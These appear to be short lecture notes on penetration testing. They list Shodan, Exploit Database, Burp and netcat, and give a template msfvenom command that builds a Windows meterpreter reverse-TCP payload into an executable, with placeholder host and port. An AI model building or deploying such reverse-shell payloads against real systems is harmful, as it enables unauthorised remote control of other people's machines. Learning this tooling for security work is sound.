#Nil predavanje
mmesojednik@nil.com

##Databases of iot devices, exploits
*SHODAN
*Exploit Database

##Metasploit
$msfvenom
$msfconsole
*reverse TCP!
Generate a payload for a user:
find the right payload:
$msfvenom -l payloads
npr: windows/meterpreter/reverse_tcp
$msfvenom -p <payload> LHOST=<host.ip> LPORT=<port.ip> > file.exe

##Useful ports
80 HTTP
443 SSL
445 SAMBA

#Interception proxy Burp
Catches every HTTP request from browser, enables modification. (Catch login onto router command.)

#Useful shell programs
netcat: method for enabling a service
tcpdump




